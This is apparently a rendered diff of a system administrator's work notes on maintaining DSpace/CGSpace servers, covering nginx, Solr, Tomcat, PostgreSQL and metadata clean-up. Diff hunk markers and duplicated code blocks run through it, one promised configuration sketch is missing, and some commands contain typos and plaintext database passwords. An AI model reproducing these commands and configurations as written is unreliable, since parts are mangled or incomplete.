<li>According to nginx docs the <a href="https://nginx.org/en/docs/hash.html">bucket size should be a multiple of the CPU&rsquo;s cache alignment</a>, which is 64 for us:</li>
</ul>
<pre><code># cat /proc/cpuinfo | grep cache_alignment | head -n1
<pre tabindex="0"><code># cat /proc/cpuinfo | grep cache_alignment | head -n1
cache_alignment : 64
</code></pre><ul>
<li>On our servers that is 64, so I increased this parameter to 128 and deployed the changes to nginx</li>
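<li>The change itself is just one directive in the <code>http</code> context of <em>nginx.conf</em> (a sketch of the deployed setting):</li>
</ul>
<pre><code># the default is 64; long user agent strings in the badbots map need more room
map_hash_bucket_size 128;
</code></pre><ul>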
@ -637,19 +637,19 @@ cache_alignment : 64
<li>Linode rebooted DSpace Test and CGSpace for their host hypervisor kernel updates</li>
<li>Following up with the Solr sharding issue on the dspace-tech mailing list, I noticed this interesting snippet in the Tomcat <code>localhost_access_log</code> at the time of my sharding attempt on my test machine:</li>
</ul>
<pre><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 107
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 447
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 76
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 63
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&quot; 200 2137630
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 16253
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabi
n&amp;version=2 HTTP/1.1&quot; 409 156
<pre tabindex="0"><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 447
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 76
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 2137630
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16253
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin
&amp;version=2 HTTP/1.1&#34; 409 156
</code></pre><ul>
<li>The new core is created but when DSpace attempts to POST to it there is an HTTP 409 error</li>
<li>This is apparently a common Solr error code that means &ldquo;version conflict&rdquo;: <a href="http://yonik.com/solr/optimistic-concurrency/">http://yonik.com/solr/optimistic-concurrency/</a></li>
<li>Looks like that bot from the PerfectIP.net host ended up making about 450,000 requests to XMLUI alone yesterday:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&quot; | grep &quot;10/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34; | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
21572 70.36.107.50
30722 70.36.107.190
34566 70.36.107.49
@ -659,25 +659,25 @@ cache_alignment : 64
</code></pre><ul>
<li>Wow, I just figured out how to set the application name of each database pool in the JNDI config of Tomcat&rsquo;s <code>server.xml</code>:</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspaceWeb&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
driverClassName=&#34;org.postgresql.Driver&#34;
url=&#34;jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb&#34;
username=&#34;dspace&#34;
password=&#34;dspace&#34;
initialSize=&#39;5&#39;
maxActive=&#39;75&#39;
maxIdle=&#39;15&#39;
minIdle=&#39;5&#39;
maxWait=&#39;5000&#39;
validationQuery=&#39;SELECT 1&#39;
testOnBorrow=&#39;true&#39; /&gt;
</code></pre><ul>
<li>So theoretically I could name each connection &ldquo;xmlui&rdquo; or &ldquo;dspaceWeb&rdquo; or something meaningful and it would show up in PostgreSQL&rsquo;s <code>pg_stat_activity</code> table!</li>
<li>This would be super helpful for figuring out where load was coming from (now I wonder if I could figure out how to graph this)</li>
<li>Also, I realized that the <code>db.jndi</code> parameter in dspace.cfg needs to match the <code>name</code> value in your application&rsquo;s context—not the <code>global</code> one</li>
<li>Ah hah! Also, I can name the default DSpace connection pool in dspace.cfg as well, like:</li>
</ul>
<pre tabindex="0"><code>db.url = jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceDefault
</code></pre><ul>
<li>With that it is super easy to see where PostgreSQL connections are coming from in <code>pg_stat_activity</code></li>
</ul>
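<ul>
<li>For example, a query along these lines (just a sketch; the exact names depend on which pools are connected) groups the connections by their application name:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT application_name, count(*) FROM pg_stat_activity GROUP BY application_name ORDER BY count DESC;
</code></pre>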
<ul>
<li>I&rsquo;m looking at the <a href="https://wiki.lyrasis.org/display/DSDOC6x/Installing+DSpace#InstallingDSpace-ServletEngine(ApacheTomcat7orlater,Jetty,CauchoResinorequivalent)">DSpace 6.0 Install docs</a> and notice they tweak the number of threads in their Tomcat connector:</li>
</ul>
<pre tabindex="0"><code>&lt;!-- Define a non-SSL HTTP/1.1 Connector on port 8080 --&gt;
&lt;Connector port=&#34;8080&#34;
maxThreads=&#34;150&#34;
minSpareThreads=&#34;25&#34;
maxSpareThreads=&#34;75&#34;
enableLookups=&#34;false&#34;
redirectPort=&#34;8443&#34;
acceptCount=&#34;100&#34;
connectionTimeout=&#34;20000&#34;
disableUploadTimeout=&#34;true&#34;
URIEncoding=&#34;UTF-8&#34;/&gt;
</code></pre><ul>
<li>In Tomcat 8.5 the <code>maxThreads</code> defaults to 200 which is probably fine, but tweaking <code>minSpareThreads</code> could be good</li>
<li>I don&rsquo;t see a setting for <code>maxSpareThreads</code> in the docs so that might be an error</li>
<li>Looks like in Tomcat 8.5 the default URIEncoding for Connectors is UTF-8, so we don&rsquo;t need to specify that manually anymore: <a href="https://tomcat.apache.org/tomcat-8.5-doc/config/http.html">https://tomcat.apache.org/tomcat-8.5-doc/config/http.html</a></li>
<li>Ooh, I just saw the <code>acceptorThreadCount</code> setting (in Tomcat 7 and 8.5); there is a sketch combining it with <code>minSpareThreads</code> after the quote below:</li>
</ul>
<pre tabindex="0"><code>The number of threads to be used to accept connections. Increase this value on a multi CPU machine, although you would never really need more than 2. Also, with a lot of non keep alive connections, you might want to increase this value as well. Default value is 1.
</code></pre><ul>
<li>That could be very interesting</li>
</ul>
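<ul>
<li>A minimal sketch of how those two tweaks might look on our connector (the values are only illustrative, not tested yet):</li>
</ul>
<pre tabindex="0"><code>&lt;Connector port=&#34;8080&#34;
           protocol=&#34;HTTP/1.1&#34;
           minSpareThreads=&#34;20&#34;
           acceptorThreadCount=&#34;2&#34;
           connectionTimeout=&#34;20000&#34;
           redirectPort=&#34;8443&#34; /&gt;
</code></pre>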
<ul>
<li>Still testing DSpace 6.2 on Tomcat 8.5.24</li>
<li>Catalina errors at Tomcat 8.5 startup:</li>
</ul>
<pre tabindex="0"><code>13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of &#34;35&#34; for &#34;maxActive&#34; property, which is being ignored.
13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of &#34;5000&#34; for &#34;maxWait&#34; property, which is being ignored.
</code></pre><ul>
<li>I looked in my Tomcat 7.0.82 logs and I don&rsquo;t see anything about DBCP2 errors, so I guess this is a Tomcat 8.0.x or 8.5.x thing</li>
<li>DBCP2 appears to be Tomcat 8.0.x and up according to the <a href="https://tomcat.apache.org/migration-8.html">Tomcat 8.0 migration guide</a></li>
<li>I have updated our <a href="https://github.com/ilri/rmg-ansible-public/commit/246f9d7b06d53794f189f0cc57ad5ddd80f0b014">Ansible infrastructure scripts</a> so that they will be ready whenever we switch to Tomcat 8 (probably with Ubuntu 18.04 later this year)</li>
<li>When I enable the ResourceLink in the ROOT.xml context I get the following error in the Tomcat localhost log:</li>
</ul>
<pre tabindex="0"><code>13-Jan-2018 14:14:36.017 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.app.util.DSpaceWebappListener]
java.lang.ExceptionInInitializerError
at org.dspace.app.util.AbstractDSpaceWebapp.register(AbstractDSpaceWebapp.java:74)
at org.dspace.app.util.DSpaceWebappListener.contextInitialized(DSpaceWebappListener.java:31)
Caused by: java.lang.NullPointerException
</code></pre><ul>
<li>Help Udana from IWMI export a CSV from DSpace Test so he can start trying a batch upload</li>
<li>I&rsquo;m going to apply these ~130 corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
</code></pre><ul>
<li>Continue proofing Peter&rsquo;s author corrections that I started yesterday, faceting on non-blank, non-flagged, and briefly scrolling through the values of the corrections to find encoding errors for French and Spanish names</li>
</ul>
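<ul>
<li>A custom text facet along these lines works for that (a sketch, assuming the corrections are in a column named <code>correct</code> as used by fix-metadata-values.py):</li>
</ul>
<pre tabindex="0"><code>and(isNonBlank(cells[&#34;correct&#34;].value), not(row.flagged))
</code></pre>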
<ul>
<li>Apply corrections using <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a>:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>In looking at some of the values to delete or check I found some metadata values whose handles I could not resolve via SQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Tarawali&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
2757936 | 4369 | 3 | Tarawali | | 9 | | 600 | 2
(1 row)
dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;4369&#39;;
handle
--------
(0 rows)
</code></pre><ul>
<li>Otherwise, the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL Helper Functions</a> provide <code>ds5_item2itemhandle()</code>, which is much easier than my long query above that I always have to go search for</li>
<li>For example, to find the Handle for an item that has the author &ldquo;Erni&rdquo;:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Erni&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+--------------------------------------+------------+------------------
2612150 | 70308 | 3 | Erni | | 9 | 3fe10c68-6773-49a7-89cc-63eb508723f2 | -1 | 2
dspace=# select ds5_item2itemhandle(70308);
</code></pre><ul>
<li>Next I apply the author deletions:</li>
</ul>
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now working on the affiliation corrections from Peter:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now I made a new list of affiliations for Peter to look through:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 4552
</code></pre><ul>
<li>Looking over the affiliations again I see dozens of CIAT ones with their affiliation formatted like: International Center for Tropical Agriculture (CIAT)</li>
<li>Help Sisay with some thumbnails for book chapters in Open Refine and SAFBuilder</li>
<li>CGSpace users were having problems logging in, I think something&rsquo;s wrong with LDAP because I see this in the logs:</li>
</ul>
<pre tabindex="0"><code>2018-01-15 12:53:15,810 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2386749547D03E0AA4EC7E44181A7552:ip_addr=x.x.x.x:ldap_authentication:type=failed_auth javax.naming.AuthenticationException\colon; [LDAP\colon; error code 49 - 80090308\colon; LdapErr\colon; DSID-0C090400, comment\colon; AcceptSecurityContext error, data 775, v1db1^@]
</code></pre><ul>
<li>Looks like we processed 2.9 million requests on CGSpace in 2017-12:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Dec/2017&#34;
2890041
real 0m25.756s
sys     0m2.210s
</code></pre><ul>
<li>Discuss standardized names for CRPs and centers with ICARDA (don&rsquo;t wait for CG Core)</li>
<li>Re-send DC rights implementation and forward to everyone so we can move forward with it (without the URI field for now)</li>
<li>Start looking at where I was with the AGROVOC API</li>
<li>Have a controlled vocabulary for CGIAR authors&rsquo; names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)</li>
<li>Need to find the metadata field name that ICARDA is using for their ORCIDs</li>
<li>Update text for DSpace version plan on wiki</li>
<li>Come up with an SLA, something like: <em>In return for your contribution we will, to the best of our ability, ensure 99.5% (&ldquo;two and a half nines&rdquo;) uptime of CGSpace, ensure data is stored in open formats and safely backed up, follow CG Core metadata standards, &hellip;</em></li>
<li>Also, there are whitespace issues in many columns, and the items are mapped to the LIVES and ILRI articles collections, not Theses</li>
<li>In any case, importing them like this:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives.map &amp;&gt; lives.log
</code></pre><ul>
<li>And fantastic, before I started the import there were 10 PostgreSQL connections, and then CGSpace crashed during the upload</li>
<li>When I looked there were 210 PostgreSQL connections!</li>
<li>I don&rsquo;t see any high load in XMLUI or REST/OAI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
381 40.77.167.124
403 213.55.99.121
431 207.46.13.60
593 54.91.48.104
757 104.196.152.243
776 66.249.66.90
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
11 205.201.132.14
11 40.77.167.124
15 35.226.23.240
</code></pre><ul>
<li>But I do see this strange message in the dspace log:</li>
</ul>
<pre tabindex="0"><code>2018-01-17 07:59:25,856 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (org.apache.http.NoHttpResponseException) caught when processing request to {}-&gt;http://localhost:8081: The target server failed to respond
2018-01-17 07:59:25,856 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ Retrying request to {}-&gt;http://localhost:8081
</code></pre><ul>
<li>I have NEVER seen this error before, and there is no error before or after that in DSpace&rsquo;s solr.log</li>
<li>Tomcat&rsquo;s catalina.out does show something interesting, though, right at that time:</li>
</ul>
<pre tabindex="0"><code>[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:02
[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:11
[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 44 seconds. timestamp: 2018-01-17 07:57:37
[====================&gt; ]40% time remaining: 7 hour(s) 16 minute(s) 5 seconds. timestamp: 2018-01-17 07:57:49
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-627&#34; java.lang.OutOfMemoryError: Java heap space
at org.apache.lucene.util.FixedBitSet.clone(FixedBitSet.java:576)
at org.apache.solr.search.BitDocSet.andNot(BitDocSet.java:222)
at org.apache.solr.search.SolrIndexSearcher.getProcessedFilter(SolrIndexSearcher.java:1067)
</code></pre><ul>
<li>You can see the timestamp above, which is some Atmire nightly task I think, but I can&rsquo;t figure out which one</li>
<li>So I restarted Tomcat and tried the import again, which finished very quickly and without errors!</li>
</ul>
<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives2.map &amp;&gt; lives2.log
</code></pre><ul>
<li>Looking at the JVM graphs from Munin it does look like the heap ran out of memory (see the blue dip just before the green spike when I restarted Tomcat):</li>
</ul>
<ul>
<li>I&rsquo;m playing with maven repository caching using Artifactory in a Docker instance: <a href="https://www.jfrog.com/confluence/display/RTF/Installing+with+Docker">https://www.jfrog.com/confluence/display/RTF/Installing+with+Docker</a></li>
</ul>
<pre tabindex="0"><code>$ docker pull docker.bintray.io/jfrog/artifactory-oss:latest
$ docker volume create --name artifactory5_data
$ docker network create dspace-build
$ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss:latest
</code></pre><ul>
<li>Wow, I even managed to add the Atmire repository as a remote and map it into the <code>libs-release</code> virtual repository, then tell maven to use it for <code>atmire.com-releases</code> in settings.xml! (a sketch of the mirror entry is below)</li>
<li>Hmm, some maven dependencies for the SWORDv2 web application in DSpace 5.5 are broken:</li>
</ul>
